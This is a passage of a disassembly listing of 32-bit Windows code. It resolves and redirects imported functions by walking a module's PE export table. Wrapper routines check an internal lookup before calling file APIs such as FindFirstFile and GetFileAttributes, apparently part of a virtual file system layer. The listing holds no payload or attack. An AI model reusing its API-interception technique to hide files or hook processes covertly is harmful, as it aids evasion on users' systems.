var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_4], 0
push [ebp+arg_8]
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_509F6B
push [ebp+arg_8]
call ds:dword_51175C ; LoadLibraryA
mov [ebp+var_10], eax
loc_509F6B: ; CODE XREF: sub_509F43+1A�j
cmp [ebp+var_10], 0
jnz short loc_509F87
push ds:off_50E4F8
push 0DDh
push ds:off_50E4FC
call sub_50848C
loc_509F87: ; CODE XREF: sub_509F43+2C�j
push 1
push [ebp+var_10]
mov ecx, ds:dword_5160D8
call sub_50B98E
mov eax, [ebp+var_10]
and eax, 0FFFh
test eax, eax
jz short loc_509FBF
mov eax, [ebp+var_10]
and ax, 0F000h
mov [ebp+var_8], eax
push 1
push [ebp+var_8]
mov ecx, ds:dword_5160D8
call sub_50B98E
jmp short loc_509FC5
; ---------------------------------------------------------------------------
loc_509FBF: ; CODE XREF: sub_509F43+5E�j
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
loc_509FC5: ; CODE XREF: sub_509F43+7A�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
add ecx, [eax+3Ch]
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
cmp dword ptr [eax], 4550h
jnz short loc_509FE8
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
add ecx, [eax+78h]
mov [ebp+var_4], ecx
loc_509FE8: ; CODE XREF: sub_509F43+97�j
and [ebp+var_14], 0
jmp short loc_509FF5
; ---------------------------------------------------------------------------
loc_509FEE: ; CODE XREF: sub_509F43:loc_50A082�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_509FF5: ; CODE XREF: sub_509F43+A9�j
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_4]
jnb loc_50A087
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*8+4]
push [ebp+var_10]
call ds:dword_511728 ; GetProcAddress
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_50A035
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*8]
push eax
push [ebp+var_18]
mov ecx, ds:dword_5160D4
call sub_50B98E
loc_50A035: ; CODE XREF: sub_509F43+D8�j
cmp [ebp+var_4], 0
jz short loc_50A082
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*8+4]
push [ebp+var_4]
push [ebp+var_8]
call sub_509C8E
add esp, 0Ch
mov [ebp+var_1C], eax
mov eax, [ebp+var_18]
cmp eax, [ebp+var_1C]
jz short loc_50A082
cmp [ebp+var_1C], 0
jz short loc_50A082
cmp [ebp+var_18], 0
jz short loc_50A082
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*8]
push eax
push [ebp+var_1C]
mov ecx, ds:dword_5160D4
call sub_50B98E
loc_50A082: ; CODE XREF: sub_509F43+F6�j
; sub_509F43+119�j ...
jmp loc_509FEE
; ---------------------------------------------------------------------------
loc_50A087: ; CODE XREF: sub_509F43+B8�j
cmp [ebp+arg_8], offset dword_50E5B4
jnz short locret_50A0BA
cmp [ebp+var_4], 0
jz short locret_50A0BA
push offset aWritefile ; "WriteFile"
push [ebp+var_4]
push [ebp+var_8]
call sub_509C8E
add esp, 0Ch
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short locret_50A0BA
mov eax, [ebp+var_20]
mov ds:dword_5117BC, eax
locret_50A0BA: ; CODE XREF: sub_509F43+14B�j
; sub_509F43+151�j ...
leave
retn
sub_509F43 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A0BC proc near ; CODE XREF: _5:004FD715�p
push ebp
mov ebp, esp
push 0
call sub_50A0C8
pop ebp
retn
sub_50A0BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A0C8 proc near ; CODE XREF: sub_401300+DF�p
; sub_401404+7A�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EA00
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset dword_5160B8
call ds:dword_5116C4 ; RtlEnterCriticalSection
mov ds:byte_5160D0, 1
push 0
call sub_509C54
and [ebp+var_4], 0
call sub_5071C3
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_50A138
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 1
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_50A134
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_50A134: ; CODE XREF: sub_50A0C8+5F�j
or [ebp+var_4], 0FFFFFFFFh
loc_50A138: ; CODE XREF: sub_50A0C8+4B�j
mov [ebp+var_4], 2
call sub_5046D0
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_50A16D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 3
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_50A169
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_50A169: ; CODE XREF: sub_50A0C8+94�j
or [ebp+var_4], 0FFFFFFFFh
loc_50A16D: ; CODE XREF: sub_50A0C8+80�j
mov [ebp+var_4], 4
push [ebp+arg_0]
call ds:dword_5116C8 ; ExitProcess
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_50A1B6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 5
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_50A1A2
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_50A1A2: ; CODE XREF: sub_50A0C8+CD�j
push [ebp+arg_0]
call ds:dword_5116E4 ; GetCurrentProcess
push eax
call ds:dword_511798 ; TerminateProcess
or [ebp+var_4], 0FFFFFFFFh
loc_50A1B6: ; CODE XREF: sub_50A0C8+B9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_50A0C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A1C7 proc near ; CODE XREF: sub_418D6A+22�p
; sub_41A8ED+26�p
; DATA XREF: ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push offset dword_50E5B4
push offset aSearchpatha_0 ; "SearchPathA"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+arg_0], 0
jnz short loc_50A20D
push 0
xor edx, edx
mov ecx, [ebp+arg_4]
call sub_5019D2
test eax, eax
jz short loc_50A20D
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
call ds:dword_511708 ; GetFullPathNameA
jmp short locret_50A222
; ---------------------------------------------------------------------------
loc_50A20D: ; CODE XREF: sub_50A1C7+20�j
; sub_50A1C7+30�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_4]
locret_50A222: ; CODE XREF: sub_50A1C7+44�j
leave
retn 18h
sub_50A1C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A226 proc near ; DATA XREF: _7:00511360�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EA48
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
cmp [ebp+arg_0], 0
jnz short loc_50A296
push 104h
call sub_50835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_4]
push 0
push 0
call ds:dword_5117B8 ; WideCharToMultiByte
loc_50A296: ; CODE XREF: sub_50A226+35�j
cmp [ebp+arg_0], 0
jnz short loc_50A2D3
push 0
xor edx, edx
mov ecx, [ebp+var_20]
call sub_5019D2
test eax, eax
jz short loc_50A2D3
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
call ds:dword_51170C ; GetFullPathNameW
push 0FFFFFFFFh
mov [ebp+var_2C], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_50A323
; ---------------------------------------------------------------------------
loc_50A2D3: ; CODE XREF: sub_50A226+74�j
; sub_50A226+84�j
push offset dword_50E5B4
push offset aSearchpathw ; "SearchPathW"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_1C], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_1C]
push 0FFFFFFFFh
mov [ebp+var_30], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_50A323
; ---------------------------------------------------------------------------
loc_50A311: ; DATA XREF: _6:0050EA50�o
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_5083DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_50A323: ; CODE XREF: sub_50A226+AB�j
; sub_50A226+E9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_50A226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A334 proc near ; CODE XREF: sub_410287+1FB�p
; sub_41771E+3D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4FF63E
test eax, eax
jnz short loc_50A35A
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_5116D0 ; FindFirstFileA
mov [ebp+var_4], eax
loc_50A35A: ; CODE XREF: sub_50A334+15�j
mov eax, [ebp+var_4]
leave
retn 8
sub_50A334 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A361 proc near ; DATA XREF: _7:00511300�o
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_134 = byte ptr -134h
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0050A496 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EA58
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 154h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_50835A
pop ecx
mov [ebp+var_168], eax
mov eax, [ebp+var_168]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_5117B8 ; WideCharToMultiByte
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_160]
push eax
push [ebp+var_20]
call sub_4FF63E
test eax, eax
jnz short loc_50A416
and [ebp+var_164], 0
push offset dword_50E5B4
push offset aFindfirstfilew ; "FindFirstFileW"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_164], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_164]
mov [ebp+var_1C], eax
jmp short loc_50A475
; ---------------------------------------------------------------------------
loc_50A416: ; CODE XREF: sub_50A361+84�j
lea ecx, [ebp+var_134]
lea eax, [ebp+var_160]
sub ecx, eax
lea esi, [ebp+var_160]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_4]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_134]
push eax
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_4]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_30]
push eax
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
loc_50A475: ; CODE XREF: sub_50A361+B3�j
or [ebp+var_4], 0FFFFFFFFh
call sub_50A480
jmp short loc_50A496
sub_50A361 endp
; =============== S U B R O U T I N E =======================================
sub_50A480 proc near ; CODE XREF: sub_50A361+118�p
; DATA XREF: _6:0050EA60�o
mov eax, [ebp-20h]
mov [ebp-16Ch], eax
push dword ptr [ebp-16Ch]
call sub_5083DD
pop ecx
retn
sub_50A480 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_50A361
loc_50A496: ; CODE XREF: sub_50A361+11D�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_50A361
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A4AA proc near ; DATA XREF: _7:00511308�o
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_134 = byte ptr -134h
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0050A5EB SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EA68
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 154h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_50835A
pop ecx
mov [ebp+var_168], eax
mov eax, [ebp+var_168]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_5117B8 ; WideCharToMultiByte
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_160]
push eax
push [ebp+var_20]
call sub_4FF63E
test eax, eax
jnz short loc_50A56B
and [ebp+var_164], 0
push offset dword_50E5B4
push offset aFindfirstfilee ; "FindFirstFileExW"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_164], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_164]
mov [ebp+var_1C], eax
jmp short loc_50A5CA
; ---------------------------------------------------------------------------
loc_50A56B: ; CODE XREF: sub_50A4AA+84�j
lea ecx, [ebp+var_134]
lea eax, [ebp+var_160]
sub ecx, eax
lea esi, [ebp+var_160]
mov edi, [ebp+arg_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_8]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_134]
push eax
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_8]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_30]
push eax
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
loc_50A5CA: ; CODE XREF: sub_50A4AA+BF�j
or [ebp+var_4], 0FFFFFFFFh
call sub_50A5D5
jmp short loc_50A5EB
sub_50A4AA endp
; =============== S U B R O U T I N E =======================================
sub_50A5D5 proc near ; CODE XREF: sub_50A4AA+124�p
; DATA XREF: _6:0050EA70�o
mov eax, [ebp-20h]
mov [ebp-16Ch], eax
push dword ptr [ebp-16Ch]
call sub_5083DD
pop ecx
retn
sub_50A5D5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_50A4AA
loc_50A5EB: ; CODE XREF: sub_50A4AA+129�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_50A4AA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A5FF proc near ; CODE XREF: sub_410287+5ED�p
; sub_41771E+C0�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4FF818
test eax, eax
jnz short loc_50A61F
push [ebp+arg_0]
call ds:dword_5116CC ; FindClose
mov [ebp+var_4], eax
loc_50A61F: ; CODE XREF: sub_50A5FF+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_50A5FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A626 proc near ; CODE XREF: sub_410287+20C�p
; sub_410287+5DC�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4FF6DE
test eax, eax
jnz short loc_50A650
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_5116D4 ; FindNextFileA
mov [ebp+var_4], eax
loc_50A650: ; CODE XREF: sub_50A626+19�j
mov eax, [ebp+var_4]
leave
retn 8
sub_50A626 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A657 proc near ; DATA XREF: _7:00511320�o
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 148h
push esi
push edi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_144]
push eax
push [ebp+arg_0]
call sub_4FF6DE
test eax, eax
jnz short loc_50A6A8
and [ebp+var_148], 0
push offset dword_50E5B4
push offset aFindnextfilew ; "FindNextFileW"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_148], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_148]
mov [ebp+var_4], eax
jmp short loc_50A707
; ---------------------------------------------------------------------------
loc_50A6A8: ; CODE XREF: sub_50A657+20�j
lea ecx, [ebp+var_118]
lea eax, [ebp+var_144]
sub ecx, eax
lea esi, [ebp+var_144]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_4]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_118]
push eax
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_4]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_14]
push eax
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
loc_50A707: ; CODE XREF: sub_50A657+4F�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn 8
sub_50A657 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A710 proc near ; DATA XREF: _7:00511390�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_500858
test eax, eax
jnz short loc_50A73A
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_5116FC ; GetFileInformationByHandle
mov [ebp+var_4], eax
loc_50A73A: ; CODE XREF: sub_50A710+19�j
mov eax, [ebp+var_4]
leave
retn 8
sub_50A710 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A741 proc near ; DATA XREF: _7:00511398�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_500950
test eax, eax
jnz short loc_50A76F
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_511768 ; LockFile
mov [ebp+var_4], eax
jmp short loc_50A776
; ---------------------------------------------------------------------------
loc_50A76F: ; CODE XREF: sub_50A741+12�j
mov [ebp+var_4], 1
loc_50A776: ; CODE XREF: sub_50A741+2C�j
mov eax, [ebp+var_4]
leave
retn 14h
sub_50A741 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A77D proc near ; DATA XREF: _7:005113A0�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_500950
test eax, eax
jnz short loc_50A7A8
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_51179C ; UnlockFile
jmp short locret_50A7AB
; ---------------------------------------------------------------------------
loc_50A7A8: ; CODE XREF: sub_50A77D+12�j
push 1
pop eax
locret_50A7AB: ; CODE XREF: sub_50A77D+29�j
leave
retn 14h
sub_50A77D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A7AF proc near ; CODE XREF: sub_401404+19B�p
; sub_40FFD8+10F�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_501CA8
test eax, eax
jnz short loc_50A7CD
push [ebp+arg_0]
call ds:dword_5116F4 ; GetFileAttributesA
jmp short locret_50A7D9
; ---------------------------------------------------------------------------
loc_50A7CD: ; CODE XREF: sub_50A7AF+11�j
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
locret_50A7D9: ; CODE XREF: sub_50A7AF+1C�j
leave
retn 4
sub_50A7AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A7DD proc near ; DATA XREF: _7:00511270�o
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0050A896 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EA78
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_50835A
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_5117B8 ; WideCharToMultiByte
mov [ebp+var_24], eax
cmp [ebp+var_24], 103h
ja short loc_50A85E
lea edx, [ebp+var_28]
mov ecx, [ebp+var_20]
call sub_501CA8
test eax, eax
jnz short loc_50A86C
loc_50A85E: ; CODE XREF: sub_50A7DD+70�j
push [ebp+arg_0]
call ds:dword_5116F8 ; GetFileAttributesW
mov [ebp+var_1C], eax
jmp short loc_50A87B
; ---------------------------------------------------------------------------
loc_50A86C: ; CODE XREF: sub_50A7DD+7F�j
movzx eax, [ebp+var_28]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov [ebp+var_1C], eax
loc_50A87B: ; CODE XREF: sub_50A7DD+8D�j
or [ebp+var_4], 0FFFFFFFFh
call sub_50A886
jmp short loc_50A896
sub_50A7DD endp
; =============== S U B R O U T I N E =======================================
sub_50A886 proc near ; CODE XREF: sub_50A7DD+A2�p
; DATA XREF: _6:0050EA80�o
mov eax, [ebp-20h]
mov [ebp-30h], eax
push dword ptr [ebp-30h]
call sub_5083DD
pop ecx
retn
sub_50A886 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_50A7DD
loc_50A896: ; CODE XREF: sub_50A7DD+A7�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_50A7DD
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A8AA proc near ; DATA XREF: _7:00511278�o
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0050A9D8 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EA88
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_50835A
pop ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_34]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_5117B8 ; WideCharToMultiByte
mov [ebp+var_28], eax
lea edx, [ebp+var_24]
mov ecx, [ebp+var_20]
call sub_501CA8
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_50A995
mov [ebp+var_1C], 1
movzx eax, [ebp+var_24]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+var_2C]
mov eax, [eax+0Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+20h]
mov edx, [ebp+arg_8]
mov [edx+4], ecx
mov [edx+8], eax
mov eax, [ebp+var_2C]
mov eax, [eax+0Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+20h]
mov edx, [ebp+arg_8]
mov [edx+0Ch], ecx
mov [edx+10h], eax
mov eax, [ebp+var_2C]
mov eax, [eax+0Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+20h]
mov edx, [ebp+arg_8]
mov [edx+14h], ecx
mov [edx+18h], eax
mov eax, [ebp+arg_8]
and dword ptr [eax+1Ch], 0
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+arg_8]
mov eax, [eax+8]
mov [ecx+20h], eax
jmp short loc_50A9BD
; ---------------------------------------------------------------------------
loc_50A995: ; CODE XREF: sub_50A8AA+7B�j
push offset aKernel32_0 ; "kernel32"
push offset aGetfileattri_1 ; "GetFileAttributesExW"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz short loc_50A9BD
push [ebp+arg_8]
push 0
push [ebp+arg_0]
call [ebp+var_30]
mov [ebp+var_1C], eax
loc_50A9BD: ; CODE XREF: sub_50A8AA+E9�j
; sub_50A8AA+103�j
or [ebp+var_4], 0FFFFFFFFh
call sub_50A9C8
jmp short loc_50A9D8
sub_50A8AA endp
; =============== S U B R O U T I N E =======================================
sub_50A9C8 proc near ; CODE XREF: sub_50A8AA+117�p
; DATA XREF: _6:0050EA90�o
